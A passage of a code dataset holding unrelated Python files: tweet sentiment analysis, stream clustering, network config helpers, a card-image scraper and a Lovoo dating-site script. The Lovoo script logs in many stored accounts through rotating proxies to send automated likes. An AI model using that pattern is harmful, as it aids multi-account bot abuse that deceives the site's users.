\"NEU\"].sum()\r\n print(YearlyTweets)\r\n print(MonthlyTweets)\r\n print(DailyTweets)\r\n\r\n # Visualization of Tweet Sentiments:\r\n\r\n\r\ndef CompareSentiments(covidDF, bankDF):\r\n covidTweets = covidDF['TWEET']\r\n bankTweets = bankDF['TWEET']\r\n print(\"covid tweetss \\n\", covidTweets)\r\n print(\"BANK TWEETS:::::\\n\", bankTweets)\r\n CovidPositiveList = []\r\n CovidNegativeList = []\r\n CovidNeutralList = []\r\n\r\n BankPositiveList = []\r\n BankNegativeList = []\r\n BankNeutralList = []\r\n\r\n dateTimeListCovid = pd.to_datetime(covidDF[\"DATE\"].values).tolist()\r\n dateTimeListBank = pd.to_datetime(bankDF['DATE'].values).tolist()\r\n\r\n # print(dateTimeListCovid)\r\n # print(dateTimeListBank)\r\n # print(dateTimeList)\r\n\r\n for tweet in covidTweets:\r\n if tweet != \"tweetnotfound\":\r\n analysis = TextBlob(str(tweet))\r\n if analysis.sentiment.polarity > 0:\r\n CovidPositiveList.append(1)\r\n CovidNegativeList.append(0)\r\n CovidNeutralList.append(0)\r\n elif analysis.sentiment.polarity < 0:\r\n CovidNegativeList.append(1)\r\n CovidPositiveList.append(0)\r\n CovidNeutralList.append(0)\r\n else:\r\n CovidNeutralList.append(1)\r\n CovidPositiveList.append(0)\r\n CovidNegativeList.append(0)\r\n else:\r\n CovidPositiveList.append(0)\r\n CovidNegativeList.append(0)\r\n CovidNeutralList.append(0)\r\n\r\n for tweet in bankTweets:\r\n if tweet != \"tweetnotfound\":\r\n analysis = TextBlob(str(tweet))\r\n if analysis.sentiment.polarity > 0:\r\n BankPositiveList.append(1)\r\n BankNegativeList.append(0)\r\n BankNeutralList.append(0)\r\n elif analysis.sentiment.polarity < 0:\r\n BankNegativeList.append(1)\r\n BankPositiveList.append(0)\r\n BankNeutralList.append(0)\r\n else:\r\n BankNeutralList.append(1)\r\n BankPositiveList.append(0)\r\n BankNegativeList.append(0)\r\n else:\r\n BankPositiveList.append(0)\r\n BankNegativeList.append(0)\r\n BankNeutralList.append(0)\r\n\r\n # #Polarity_List stores polarity of tweets preserving the order\r\n # forCovid df\r\n # print(\"DATA ki datee ------------- \\n\",data['DATE'])\r\n # print(\"Covid ki datee ------------- \\n\", covidDF['DATE'])\r\n\r\n df1 = pd.DataFrame(list(zip(dateTimeListCovid, CovidPositiveList, CovidNegativeList, CovidNeutralList)),\r\n columns=[\"DateTime\", \"CPositive\", \"CNegative\", \"CNeutral\"])\r\n\r\n # df for banking related tweets\r\n df2 = pd.DataFrame(list(zip(dateTimeListBank, BankPositiveList, BankNegativeList, BankNeutralList)),\r\n columns=[\"DateTime\", \"BPositive\", \"BNegative\", \"BNeutral\"])\r\n\r\n df1.set_index('DateTime')\r\n df2.set_index('DateTime')\r\n\r\n # print(df)\r\n df1['Date'] = df1[\"DateTime\"].apply(lambda df: pd.datetime(year=df.year, month=df.month, day=df.day))\r\n df2['Date'] = df2[\"DateTime\"].apply(lambda df: pd.datetime(year=df.year, month=df.month, day=df.day))\r\n\r\n print(\"DF---------------c o v i d---------------------------------------\\n\", df1)\r\n print(\"DF----------------b a n k--------------------------------------\\n\", df2)\r\n\r\n newDF1 = pd.DataFrame(list(zip(df1['Date'], df1['CPositive'], df1['CNegative'], df1['CNeutral'])),\r\n columns=[\"Date\", \"CovidPOS\", \"CovidNEG\", \"CovidNEU\"])\r\n newDF2 = pd.DataFrame(list(zip(df2['Date'], df2['BPositive'], df2['BNegative'], df2['BNeutral'])),\r\n columns=[\"Date\", \"BankPOS\", \"BankNEG\", \"BankNEU\"])\r\n\r\n print(\"newDF---------------c o v i d---------------------------------------\\n\", newDF1)\r\n print(\"newDF----------------b a n k--------------------------------------\\n\", newDF2)\r\n\r\n newDF1['Total'] = newDF1['CovidPOS'] + newDF1['CovidNEG'] + newDF1['CovidNEU']\r\n newDF2['Total'] = newDF2['BankPOS'] + newDF2['BankNEG'] + newDF2['BankNEU']\r\n\r\n print(\"newDF---------------c o v i d---------------------------------------\\n\", newDF1)\r\n print(\"newDF----------------b a n k--------------------------------------\\n\", newDF2)\r\n\r\n # dailyCovid = newDF1.groupby('Date').sum()\r\n # dailyBank = newDF2.groupby('Date').sum()\r\n\r\n dailyCovidList = newDF1.set_index('Date').resample('D')[\"CovidPOS\", \"CovidNEG\", \"CovidNEU\", \"Total\"].sum()\r\n dailyBankList = newDF2.set_index('Date').resample('D')[\"BankPOS\", \"BankNEG\", \"BankNEU\", \"Total\"].sum()\r\n\r\n print(\"DailyCovid---------------c o v i d---------------------------------------\\n\", dailyCovidList)\r\n print(\"DailyBank----------------b a n k--------------------------------------\\n\", dailyBankList)\r\n\r\n # taking out data for week 1. 1'st March to 7th March\r\n\r\n covidMonthlyList=dailyCovidList.groupby([ pd.Grouper(freq='M')]).sum()\r\n bankMonthlyList = dailyBankList.groupby([pd.Grouper(freq='M')]).sum()\r\n\r\n # covidMonthlyList = dailyCovidList.set_index('Date').resample('M')[\"CovidPOS\", \"CovidNEG\", \"CovidNEU\", \"Total\"].sum()\r\n # bankMonthlyList = dailyCovidList.set_index('Date').resample('M')[\"BankPOS\", \"BankNEG\", \"BankNEU\", \"Total\"].sum()\r\n print(\"Monthly Covid---------------c o v i d---------------------------------------\\n\", covidMonthlyList)\r\n print(\"Monthly Bank----------------b a n k--------------------------------------\\n\", bankMonthlyList)\r\n\r\n # totalTweets categorised based on month PLOT\r\n\r\n totalMonthlyList = []\r\n for i in range(len(covidMonthlyList)):\r\n print(\"total covid monthly: \",covidMonthlyList['Total'][i] ,\"total bank month;y: \", bankMonthlyList['Total'][i])\r\n totalMonthlyList.append(covidMonthlyList['Total'][i] + bankMonthlyList['Total'][i])\r\n\r\n colors = [\"#00695C\", \"#00897B\"]\r\n data_2weeks = [[\"Febraury\", \"Febraury\", \"March\", \"March\", \"April\", \"April\", \"May\", \"May\"],\r\n [\"Covid-19\", \"Bank\", \"Covid-19\", \"Bank\", \"Covid-19\", \"Bank\", \"Covid-19\", \"Bank\"],\r\n [round(covidMonthlyList['Total'][0] / totalMonthlyList[0] * 100),round( bankMonthlyList['Total'][0] / totalMonthlyList[0] * 100),\r\n round(covidMonthlyList['Total'][1] / totalMonthlyList[1] * 100), round(bankMonthlyList['Total'][1] / totalMonthlyList[1] * 100),\r\n round(covidMonthlyList['Total'][2] / totalMonthlyList[2] * 100), round(bankMonthlyList['Total'][2] / totalMonthlyList[2] * 100),\r\n round(covidMonthlyList['Total'][3] / totalMonthlyList[3] * 100), round(bankMonthlyList['Total'][3] / totalMonthlyList[3] * 100),\r\n ]\r\n ]\r\n print(\"data 2 weeks::: \", data_2weeks)\r\n rows_2Weeks = zip(data_2weeks[0], data_2weeks[1], data_2weeks[2])\r\n headers_2Weeks = ['Monthly Comparison', 'Tweet', 'Value']\r\n WeekDF_2Weeks = pd.DataFrame(rows_2Weeks, columns=headers_2Weeks)\r\n pivot_df_2Weeks = WeekDF_2Weeks.pivot(index='Monthly Comparison', columns='Tweet', values='Value')\r\n # Note: .loc[:,['Positive','Negative', 'Neutral']] is used here to rearrange the layer ordering\r\n pivot_df_2Weeks.loc[:, [\"Covid-19\", \"Bank\", ]].plot.bar(stacked=True, color=colors, figsize=(5, 7))\r\n plt.show()\r\n\r\n # PLOT A STACKED BAR CHART for week1 ------COVID vs BANKING\r\n\r\n # PLOT COVID VS BANKING TWEETS\r\n # PlotLine-- Negative Tweets (Week 1 vs Week 2)\r\n X_Base = [1, 2, 3, 4]\r\n plt.plot(X_Base, covidMonthlyList['Total'], label=\"Covid tweets\")\r\n plt.plot(X_Base, bankMonthlyList['Total'], label=\"Banking tweets\")\r\n plt.ylabel(\"Tweets\")\r\n plt.xlabel(\"#Week\")\r\n plt.legend()\r\n plt.show()\r\n\r\n # PLOT A STACKED BAR CHART for all weeks ------Total COVID vs BANKING\r\n\r\n # endFunction\r\n\r\n\r\ndef VisualiseTweets(tweetList):\r\n tweetWords = \"\"\r\n allTokens = \"\"\r\n stopwords = STOPWORDS\r\n garbageTerms2 = ['', \"http\", \"want\", \"need\", \"' \", '’ ', \"us\", \"hi\", \"hey\", \"find\", \"due\", \"look\", \"set\", \"thats\",\r\n \"sure\", \"hsbc\", 'good', 'dont',\r\n \"https\", \"open\", \"hello\", \"404\", \"nt\", \"able\", '.', 'hi', 'i', 'isa', \"get\", \"know\", '.', 'dm',\r\n 'via', 'iâ\\x80\\x99ve', 'got',\r\n \"http\", \"want\", \"need\", \"' \", '’ ', \"us\", \"please\", \"nt\", \"able\", 'nick', \"covid\", \"covid-19\",\r\n 'the', 'if', 'yuriy', 'tijianne', 'name',\r\n \"get\", \"know\", \"coronavirus\", \"virus\", 'ank', 'im', '22', 'see', 'alison', 'give', 'mill', 'see',\r\n 'via', 'sam', 'full', '03457', \"thank\", \"hsbcuk\", \"one\", \"still\", \"app\", \"day\", \"go\", \"hear\",\r\n \"week\", \"take\", \"make\", \"use\", \"click\", \"even\", \"new\", \"cent\"]\r\n for val in tweetList:\r\n\r\n # typecaste each val to string\r\n val = str(val)\r\n if val != 'tweetnotfound':\r\n # split the value\r\n tokens = val.split()\r\n tweetText = \"\"\r\n # Converts each token into lowercase\r\n for i in range(len(tokens)):\r\n tokens[i] = tokens[i].lower()\r\n if tokens[i] not in garbageTerms2 and tokens[i] not in stopwords:\r\n allTokens += tokens[i].lower() + \" \"\r\n else:\r\n tokens[i] = ''\r\n\r\n tweetWords += \"\".join(str(tokens)) + \"\"\r\n text_list = allTokens.split(\" \")\r\n\r\n print(\"\\n\\nTWEETWORDS - - -- \\n\", tweetWords)\r\n freq = nltk.FreqDist(text_list)\r\n print(freq)\r\n top_freq = freq.most_common(30)\r\n print(top_freq)\r\n freq.plot(30, cumulative=False)\r\n\r\n plt.show()\r\n\r\n CreateWordCloud(allTokens)\r\n\r\n\r\n# print(df)\r\n\r\n# print(word_count_dict)\r\n\r\n# word_count_head=Counter(data for data in clean_data.head())\r\n\r\n#######################################START ###################\r\n\r\nimport re\r\n\r\n\r\n# removing @names\r\ndef remove_pattern(text, pattern_regex):\r\n r = re.findall(pattern_regex, str(text))\r\n for i in r:\r\n text = re.sub(i, '', str(text))\r\n\r\n return str(text)\r\n\r\n\r\nimport numpy as np\r\n\r\n# We are keeping cleaned tweets in a new column called 'tidy_tweets' for removing names who tweeted\r\ndata['tidy_tweets'] = np.vectorize(remove_pattern)(data['TWEET'], \"@[\\w]*: | *RT*\")\r\n# data['tidy_tweets']=data['TWEET']\r\n# remove links\r\ncleaned_tweets = []\r\n\r\nfor index, row in data.iterrows():\r\n # Here we are filtering out all the words that contains link\r\n words_without_links = [word for word in row.tidy_tweets.split() if 'http' not in word]\r\n cleaned_tweets.append(' '.join(words_without_links))\r\n\r\ndata['tidy_tweets'] = cleaned_tweets\r\n\r\n# deleting duplicate rows\r\ndata.drop_duplicates(subset=['tidy_tweets'], keep=False)\r\n\r\n# removing punctuations\r\npunctuations = string.punctuation\r\ngarbage = [\"'\", '[', ']', \".\", \",\", '<', '!', '&', '(', ')']\r\n# data['absolute_tidy_tweets'] = data['tidy_tweets'].str.replace(\"[^a-zA-Z# ]\", \"\")\r\ndata['absolute_tidy_tweets'] = data['tidy_tweets'].apply(\r\n lambda x: ''.join([i for i in x if i not in punctuations and i not in garbage]))\r\n\r\n# # #removing punctuation\r\n# punctuations=string.punctuation\r\n# # #not removing hyphen; incase considering time period\r\n# punctuations.replace(\"-\",'')\r\n# pattern= r\"[{}]\".format(punctuations)\r\n# words_punc_removed=[]\r\n# for w in words_in_tweets:\r\n# words_punc_removed.append(re.sub(pattern,\"\",w))\r\n\r\n# removing stopwords is,am,are\r\nstopwordsSet = set(stopwords.words(\"english\"))\r\ngarbageTerms2 = ['', \"http\", \"want\", \"need\", \"' \", '’ ', \"us\", \"hi\", \"hey\", \"find\", \"need\", \"due\", \"look\",\r\n \"including\", \"https\", \"open\", \"times\", \"hello\", \"404\", \"nt\", \"able\", '.', 'hi', \"get\", \"know\", '.',\r\n \"http\", \"want\", \"need\", \"' \", '’ ', \"us\", \"please\", \"hi\", \"hey\", \"find\", \"need\", \"due\", \"look\",\r\n \"including\", \"https\", \"open\", \"apply\", \"times\", \"hours\", \"time\", \"hello\", \"404\", \"nt\", \"able\", \"covid\",\r\n \"covid-19\", 'thats', '0800',\r\n \"get\", \"know\", \"coronavirus\", \"virus\", \"oh\", 'yuriy', 'tijianne', 'name', 'well', \"set\", \"thats\"]\r\n\r\ncleaned_tweets = []\r\n\r\nfor index, row in data.iterrows():\r\n # filerting out all the stopwords\r\n words_without_stopword1 = [word for word in row.absolute_tidy_tweets.split() if not word in stopwordsSet]\r\n words_without_stopwords = [word for word in words_without_stopword1 if not word in garbageTerms2]\r\n\r\n # finally creating tweets list of tuples containing stopwords(list) and sentimentType\r\n cleaned_tweets.append(' '.join(words_without_stopwords))\r\n\r\ndata['absolute_tidy_tweets'] = cleaned_tweets\r\n# tokenization-diving sentences into tokens and lemmatization- stopping to stop\r\n\r\nfrom nltk.stem import WordNetLemmatizer\r\n\r\n# Tokenization\r\ntokenized_tweet = data['absolute_tidy_tweets'].apply(lambda x: x.split())\r\n# Finding Lemma for each word\r\nword_lemmatizer = WordNetLemmatizer()\r\ntokenized_tweet = tokenized_tweet.apply(lambda x: [word_lemmatizer.lemmatize(i) for i in x])\r\n# joining words into sentences (from where they came from)\r\nfor i, tokens in enumerate(tokenized_tweet):\r\n tokenized_tweet[i] = ' '.join(tokens)\r\n\r\n# data.to_csv(\"Fulltweets.csv\")\r\ndata['absolute_tidy_tweets'] = tokenized_tweet\r\nprint(data)\r\ntweetsList = data['absolute_tidy_tweets']\r\nprint(\"/n - - - - printing absolute tidy tweets: /n /n \", tweetsList)\r\n\r\n###########################################\r\n\r\ncovidDF = FilterCovidTweets(data)\r\nprint(covidDF)\r\nbankDF = FilterBankTweets(data)\r\nGetTweetSentiment(tweetsList, data)\r\nindex = 0\r\ncounter = 0\r\ncovidTweetsFull = []\r\nsizeCovidDF = len(covidDF['DATE'])\r\nfor i in range(len(data['DATE'])):\r\n if index < sizeCovidDF and data['DATE'][i] == covidDF['DATE'][index]:\r\n # print(\"date is: \", data['DATE'][i], \" and matched: \", covidDF['DATE'][index], \" and index is : \", index)\r\n covidTweetsFull.append(covidDF['TWEET'][index])\r\n index += 1\r\n else:\r\n covidTweetsFull.append(\"tweetnotfound\")\r\n counter += 1\r\n\r\nindex = 0\r\ncounter = 0\r\nbankTweetsFull = []\r\nsizeBankDF = len(bankDF['DATE'])\r\nfor i in range(len(data['DATE'])):\r\n if index < sizeBankDF and data['DATE'][i] == bankDF['DATE'][index]:\r\n # print(\"date is: \", data['DATE'][i], \" and matched: \", bankDF['DATE'][index], \" and index is : \", index)\r\n bankTweetsFull.append(bankDF['TWEET'][index])\r\n index += 1\r\n else:\r\n bankTweetsFull.append(\"tweetnotfound\")\r\n counter += 1\r\n\r\nnewcovidDF = pd.DataFrame(list(zip(covidTweetsFull, data['DATE'])), columns=['TWEET', 'DATE'])\r\nnewbankDF = pd.DataFrame(list(zip(bankTweetsFull, data['DATE'])), columns=['TWEET', 'DATE'])\r\n\r\nCompareSentiments(newcovidDF, newbankDF)\r\n# count_bank_tweets=len(bankTweets)\r\n# count_covid_tweets=len(covidTweets)\r\n# print(\"#bankTweets: \",count_bank_tweets,\" #covidTweets: \",count_covid_tweets)\r\n# VisualiseTweets(newcovidDF['TWEET'])\r\n# VisualiseTweets(newbankDF['TWEET'])\r\n# CreateWordCloud(newcovidDF['TWEET'])\r\n# CreateWordCloud(newbankDF['TWEET'])\r\n","sub_path":"HSBC_UK_Sentiment_Analysis2.py","file_name":"HSBC_UK_Sentiment_Analysis2.py","file_ext":"py","file_size_in_byte":20089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"647705881","text":"from utils import min_dist, dist\nfrom find_neighbors import find_neighbors\nfrom update_cluster import updateCluster\nfrom find_overlap import find_overlap\nfrom merge_clusters import merge_clusters\nfrom new_cluster import newCluster\n\n\nclass SOStream:\n\n def __init__(self, alpha = 0.1, min_pts = 10, merge_threshold = 27000):\n self.alpha = alpha\n self.min_pts = min_pts\n self.M = [[]]\n self.merge_threshold = merge_threshold\n\n def process(self, vt):\n winner_micro_cluster = min_dist(vt, self.M[-1])\n new_M = self.M[-1].copy()\n if len(new_M) >= self.min_pts:\n winner_neighborhood = find_neighbors(winner_micro_cluster, self.min_pts, new_M)\n if dist(vt, winner_micro_cluster.centroid) < winner_micro_cluster.radius:\n updateCluster(winner_micro_cluster, vt, self.alpha, winner_neighborhood)\n else:\n new_M.append(newCluster(vt))\n overlap = find_overlap(winner_micro_cluster, winner_neighborhood)\n if len(overlap) > 0:\n merged_cluster, deleted_clusters = merge_clusters(winner_micro_cluster, overlap, self.merge_threshold)\n for deleted_cluster in deleted_clusters:\n new_M.remove(deleted_cluster)\n if merged_cluster is not None:\n new_M.append(merged_cluster)\n else:\n new_M.append(newCluster(vt))\n self.M.append(new_M)\n pass\n","sub_path":"src/sostream.py","file_name":"sostream.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"542894814","text":"\"\"\"igvm - Network Utilities\n\nCopyright (c) 2018, InnoGames GmbH\n\"\"\"\n\nimport logging\n\nfrom adminapi.dataset import Query\nfrom adminapi.filters import Contains, Not\n\nlog = logging.getLogger(__name__)\n\n\ndef get_network_config(server):\n ret = {}\n # It is impossible to use server['route_network']\n # if IP address of a server was changed via --newip.\n route_network = Query({\n 'servertype': 'route_network',\n 'state': Not('retired'),\n 'intern_ip': Contains(server['intern_ip']),\n }, [\n 'hostname',\n 'intern_ip',\n 'default_gateway',\n 'internal_gateway',\n 'primary_ip6',\n 'vlan_tag',\n ]).get()\n\n default_gateway_route, internal_gateway_route = get_gateways(route_network)\n\n # For server installation internal gateway is the default and the only one\n if server.get('intern_ip'):\n ret['ipv4_address'] = server['intern_ip']\n ret['ipv4_netmask'] = route_network['intern_ip'].prefixlen\n ret['ipv4_default_gw'] = internal_gateway_route.get('intern_ip', None)\n\n if server.get('primary_ip6'):\n ret['ipv6_address'] = server['primary_ip6']\n ret['ipv6_netmask'] = route_network['primary_ip6'].prefixlen\n ret['ipv6_default_gw'] = internal_gateway_route.get(\n 'primary_ip6', None\n )\n\n ret['vlan_tag'] = route_network['vlan_tag']\n ret['vlan_name'] = route_network['hostname']\n\n return ret\n\n\ndef get_gateways(network):\n \"\"\" Get default and internal gateway Serveradmin objects\n for given network. If they are not defined, return\n empty dictionaries to simulate Serveradmin objects.\n \"\"\"\n\n if network.get('default_gateway'):\n default_gateway = Query({\n 'state': Not('retired'),\n 'hostname': network['default_gateway'],\n }).get()\n else:\n default_gateway = {}\n\n if network.get('internal_gateway'):\n internal_gateway = Query({\n 'state': Not('retired'),\n 'hostname': network['internal_gateway'],\n }).get()\n else:\n internal_gateway = {}\n\n return default_gateway, internal_gateway\n","sub_path":"igvm/utils/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"397897423","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n# 功能描述:\n# 目的:在炉石传说官网上的卡牌管理器上爬取卡牌图片,并分类保存\n# 输入:无\n# 输出:分类保存的图片文件\n#\n# 核心问题:处理网页上js效果,下载图片\n# 优化思路:提供进度展示\n# 技术路线:request,bs,re,selenium模拟\n# 程序结构设计:\n# step1:class HearthStone():设置全局变量,提供进度展示\n# step2:hearthStoneSpider:启动模拟浏览器,触发js效果\n# closeGuide\n# step3:getPicList:bs煲汤,获取图片的地址\n# step4:savePic:request下载保存图片,展示进度\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport traceback\nimport time\nimport os\n\n\nclass HearthStone():\n # 保存全局变量\n def __init__(self):\n # 设置和启动模拟浏览器\n # options = Options()\n # options.add_argument('--headless')\n # options.add_argument('--disable-gpu')\n # self.driver = webdriver.Chrome(chrome_options=options)\n\n self.driver = webdriver.Chrome()\n # 记录开始时间\n self.time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n # 一共需要爬取的图片数量\n self.end = 1\n # 已经下载的图片数量\n self.start = 0\n\n def hearthStoneSpider(self):\n # 获取首地址\n self.driver.get('https://hs.blizzard.cn/cards/')\n\n # 关闭引导界面\n firstBtn = self.driver.find_element_by_class_name(\"closeGuide\")\n # 引导页面可能会出现错误,标签(炉石官方app)重合了,需要显示页面移动一下?\n self.driver.maximize_window()\n # 停留式,点击下一页\n ActionChains(self.driver).move_to_element(firstBtn).perform()\n time.sleep(1)\n ActionChains(self.driver).click(firstBtn).perform()\n time.sleep(1)\n\n # 切换到狂野界面\n # changeBtn=self.driver.find_element_by_class_name(\"mode_icon mode_standard\") #class name不行\n changeBtn = self.driver.find_element_by_xpath(\n '/html/body/div[3]/div/div[2]/div/div[1]/div/div[3]/div[2]/div[1]/div[2]/div[2]/ul/li[1]/a/span')\n ActionChains(self.driver).move_to_element(changeBtn).perform()\n time.sleep(1)\n ActionChains(self.driver).click(changeBtn).perform()\n time.sleep(1)\n # 对于触发按钮是和贴纸式可以使用xpath\n wildBtn = self.driver.find_element_by_xpath(\n '/html/body/div[3]/div/div[2]/div/div[1]/div/div[3]/div[2]/div[1]/div[2]/div[2]/ul/li[1]/a/ul/li[2]')\n ActionChains(self.driver).move_to_element(wildBtn).perform()\n time.sleep(1)\n ActionChains(self.driver).click(wildBtn).perform()\n time.sleep(1)\n\n # 更换九大职业\n for i in range(9):\n try:\n xPath = '/html/body/div[3]/div/div[2]/div/div[1]/div/div[3]/div[2]/div[1]/ul/li[' + str(i + 1) + ']/a'\n heroBtn = self.driver.find_element_by_xpath(xPath)\n ActionChains(self.driver).move_to_element(heroBtn).perform()\n time.sleep(1)\n ActionChains(self.driver).click(heroBtn).perform()\n time.sleep(1)\n\n # 如果下一页按钮显示,则一直按键\n while True:\n # 获取下一页按钮\n # nextBtn=self.driver.find_element_by_name(\"cards_next\")\n nextBtn = self.driver.find_element_by_css_selector('a[class=\"cards_next\"]')\n # 如果下一页隐藏就跳出来,从页面源码上直接匹配字段\n if self.driver.page_source.find(\n 'class=\"cards_next\" href=\"javascript:void(0);\" style=\"display: none;\"') != -1:\n break\n # 停留式,点击下一页\n # ActionChains(self.driver).move_to_element(nextBtn).perform()\n # time.sleep(1)\n ActionChains(self.driver).click(nextBtn).perform()\n # time.sleep(1)\n lst = self.getPicList(self.driver.page_source)\n self.end = len(lst) * 9\n self.savePic(lst)\n except:\n # try except 只仅对于循环\n #traceback.print_exc() # 获得其中的错误信息\n continue\n\n def getPicList(self, html):\n # 新建一个列表\n lst = []\n soup = bs(html, 'lxml')\n # 将图片链接存入列表\n # srcs=soup.find_all('img',{'class':'imgload'})\n # srcs = soup.select('img[class=\"imgload\"]')\n srcs = soup.select('.card_img')\n # print(type(srcs))\n # print(srcs)\n for i in range(len(srcs)):\n src = srcs[i]\n lst.append(src.attrs['src'])\n return lst\n\n def savePic(self, lst):\n for i in range(len(lst)):\n # 处理名字和地址\n name = lst[i].split('/')[-1]\n # print(name)\n fname = name.split('_')[2] + '_' + name.split('_')[3] + '_' + name.split('_')[5] # 处理,一个列表\n froot = '/home/xiaowu/bear/hearthstone/' + name.split('_')[0] + '/' # 绝对路径\n fpath = froot + fname\n try:\n if not os.path.exists(froot):\n os.mkdir(froot)\n if not os.path.exists(fpath):\n # 提交请求,下载处理\n # print(lst[i])\n r = requests.get(lst[i])\n # r.raise_for_status()\n with open(fpath, 'wb') as f:\n f.write(r.content)\n # 把打印进度放在循环里面\n self.start += 1\n print('\\r当前进度:{:.2f}%'.format(self.start * 100 / self.end), end='') # \\r能够打印的最后光标提到最前面\n except:\n #traceback.print_exc() # 获得其中的错误信息\n print('爬取失败:' + fname)\n continue\n\n\nif __name__ == '__main__':\n stone = HearthStone()\n print('开始时间:' + stone.time)\n stone.hearthStoneSpider()\n print('\\r爬取结束:' + time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n stone.driver.quit()\n print('模拟浏览器关闭!')","sub_path":"10-hearthstonepicspider.py","file_name":"10-hearthstonepicspider.py","file_ext":"py","file_size_in_byte":6512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"332882053","text":"from pathlib import Path\nimport requests\nimport datetime\nimport sys\nimport Proxy\n\n\ndef read_users_info_to_list(path_to_file):\n path = Path(path_to_file)\n if path.is_file():\n try:\n file = open(path, 'r+')\n user_list = [line.rstrip('\\n') for line in file.readlines()]\n if not user_list:\n print(\"List is empty, exit\")\n sys.exit()\n return user_list\n except Exception as error:\n write_to_log('Failed to read', error)\n finally:\n file.close()\n else:\n sys.exit('File not exist ' + path_to_file)\n\n\ndef write_to_log(message='', exception='', exc_info=''):\n info = exc_info\n # a Open an existing file for appending plain text\n log_file = open('log.log', 'a')\n log_file.write('{0} {1} {2}\\n'.format(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), message,\n exception, info))\n log_file.close()\n\n\ndef login(account):\n # Read user info\n try:\n arr = account.split('|')\n if len(arr) >= 2:\n username = arr[0]\n password = arr[1]\n except Exception as error:\n write_to_log(\"Failed to read \" + account, error, sys.exc_info())\n\n # Login\n proxy = Proxy.Proxy()\n proxy = proxy.get_proxy()\n\n url = 'https://de.lovoo.com/login_check'\n session = requests.Session()\n\n try:\n payload = {'_username': username,\n '_password': password,\n '_remember_me': 'false'\n }\n # header = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n # 'Chrome/71.0.3578.98 Safari/537.36'}\n # response = sess.get(url, data=data, headers=header, proxies=proxy)\n response = session.post(url, data=payload, proxies={'http': proxy})\n json = response.json()\n if json['success']:\n print('Successfully logged in')\n return session\n else:\n print(json['message'])\n except Exception as error:\n print(error)\n\n\ndef read_id_without_like(session, page):\n url = 'https://de.lovoo.com/api_web.php/matches/wantyou?resultLimit=15&resultPage=' + str(page)\n\n response = session.get(url)\n json = response.json()\n results = json['response']['result']\n if json['response']['allCount'] == 0:\n print('No result on a page')\n return\n else:\n for el in results:\n # connections GET request: https://de.lovoo.com/api_web.php/users/54a4037ee56da1ea478b4586/connections to\n # get liked status\n r = session.get('https://de.lovoo.com/api_web.php/users/' + el['user']['id'] + '/connections')\n json = r.json()\n if json['response']['hasLiked'] == 0:\n return el['user']['id']\n else:\n print('Try next ID...')\n read_id_without_like(session, page + 1)\n\n\ndef is_active(session, user_id):\n\n payload = {\"userId\": str(user_id),\n \"vote\": 1,\n \"ref\": \"profile\"}\n\n url = 'https://www.lovoo.com/api_web.php/matches/' + str(user_id) + '?ref=profile&vote=1'\n\n headers = {\n 'accept': 'application/json, text/plain, */*',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7,la;q=0.6',\n 'app': 'lovoo',\n 'content-length': '62',\n 'content-type': 'application/json;charset=UTF-8',\n 'origin': 'https://www.lovoo.com',\n 'referer': 'https://www.lovoo.com/list/liked-you',\n 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\n }\n\n params = {\n 'ref': 'profile',\n 'vote': '1'\n }\n\n r = session.post(url, data=payload, headers=headers, params=params, )\n\n print(r)\n\n\ndef do_like(account):\n sess = login(account)\n id_without_like = read_id_without_like(sess, 1)\n print(id_without_like)\n is_active(sess, id_without_like)\n\n\n# ###### --- START ---- ###### #\n\naccounts_list = read_users_info_to_list('Test_user.txt')\n\nfor el_account in accounts_list:\n do_like(el_account)\n break\n","sub_path":"requests_2.0.py","file_name":"requests_2.0.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"414235780","text":"import os\nimport shutil\n\ndef PathToList(path, fileOut, tabCount = 0, recursive = True, useTabs = False):\n f = open(fileOut, 'a+')\n for item in os.listdir(path):\n fullItemPath = '%s\\\\%s'%(path, item)\n if os.path.isdir(fullItemPath):\n f.write(fullItemPath + '\\\\\\n')\n if recursive:\n PathToList(path + '\\\\' + item, fileOut, tabCount + 1)\n else:\n if fullItemPath.endswith('.db'):\n os.remove(fullItemPath)\n else:\n f.write(fullItemPath + '\\n')\n f.close()\n\n\nfor fileName in ['galaxy.txt', 'backup.txt']:\n if os.path.exists(fileName):\n os.remove(fileName)\n","sub_path":"sample/python/exploreFolder.py","file_name":"exploreFolder.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"475313348","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/hubspot/contacts/generic_utils.py\n# Compiled at: 2017-11-13 03:36:59\nfrom datetime import date\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom inspect import isgenerator\nfrom itertools import islice\nfrom uuid import uuid4 as get_uuid4\nfrom hubspot.contacts.exc import HubspotPropertyValueError\n_EPOCH_DATETIME = datetime(1970, 1, 1)\n_EPOCH_DATE = date.fromordinal(_EPOCH_DATETIME.toordinal())\n\ndef ipaginate(iterable, page_size):\n if not 